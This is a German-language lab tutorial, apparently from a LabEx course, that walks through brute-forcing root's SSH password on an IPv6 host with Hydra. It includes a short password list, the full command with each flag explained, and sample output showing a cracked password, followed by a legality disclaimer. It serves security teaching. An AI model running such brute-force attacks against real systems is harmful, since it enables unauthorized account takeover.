Erstellen einer Passwortliste:
Öffnen Sie ein Terminal in der LabEx-VM. Verwenden Sie den nano
-Editor, um eine Datei namens passwords.txt
im Verzeichnis ~/project
zu erstellen:
nano ~/project/passwords.txt
Fügen Sie die folgenden Passwörter in die Datei ein, jeweils ein Passwort pro Zeile:
password
123456
qwerty
admin
secret
Speichern Sie die Datei und verlassen Sie nano
(Strg+X, dann Y, dann Enter).
Ausführen von Hydra für den Angriff auf den IPv6-SSH-Dienst:
Jetzt verwenden wir Hydra, um den SSH-Dienst anzugreifen. Wir verwenden die Option -6
, um anzugeben, dass wir die IPv6-Adresse anvisieren möchten. Wir geben auch den zu angreifenden Benutzernamen (z. B. root
), die von uns erstellte Passwortliste (passwords.txt
) und die IPv6-Adresse des SSH-Servers (2001:db8:1::1
) an.
Führen Sie den folgenden Befehl aus:
hydra -6 -l root -P ~/project/passwords.txt ssh://2001:db8:1::1
Analysieren wir diesen Befehl:
hydra
: Der Befehl, um das Hydra-Tool auszuführen.
-6
: Gibt an, dass wir IPv6 verwenden möchten.
-l root
: Gibt den zu angreifenden Benutzernamen an. In diesem Fall greifen wir auf den Benutzer root
zu.
-P ~/project/passwords.txt
: Gibt die zu verwendende Passwortliste an. In diesem Fall verwenden wir die Datei passwords.txt
, die wir im Verzeichnis ~/project
erstellt haben.
ssh://2001:db8:1::1
: Gibt den Ziel-SSH-Dienst an. Das Präfix ssh://
zeigt an, dass wir einen SSH-Dienst angreifen, und 2001:db8:1::1
ist die IPv6-Adresse des Servers.
Hydra beginnt nun, die Passwörter in der Datei passwords.txt
gegen den SSH-Dienst zu testen. Wenn Hydra ein gültiges Passwort findet, wird es die Anmeldeinformationen anzeigen. Die Ausgabe sollte in etwa so aussehen:
Hydra v9.1 (c) 2020 by van Hauser/THC - Use freely but only for legal purposes.
Hydra starting at 2023-10-27 10:00:00
[DATA] 1 task, 5 hosts, 5 tries per host
[DATA] attacking ssh://2001:db8:1::1:22
[22][ssh] host: 2001:db8:1::1 login: root password: password
Hydra finished.
Diese Ausgabe zeigt an, dass Hydra das Passwort für den Benutzer root
erfolgreich geknackt hat und das Passwort password
lautet.
Wichtiger Hinweis: Das Brute-Forcing von Passwörtern auf einem System ohne autorisation ist illegal und unethisch. Dieser Lab ist nur zu Bildungszwecken bestimmt, und Sie sollten diese Techniken nur auf Systemen anwenden, die Sie besitzen oder für die Sie ausdrückliche Erlaubnis zur Durchführung von Tests haben.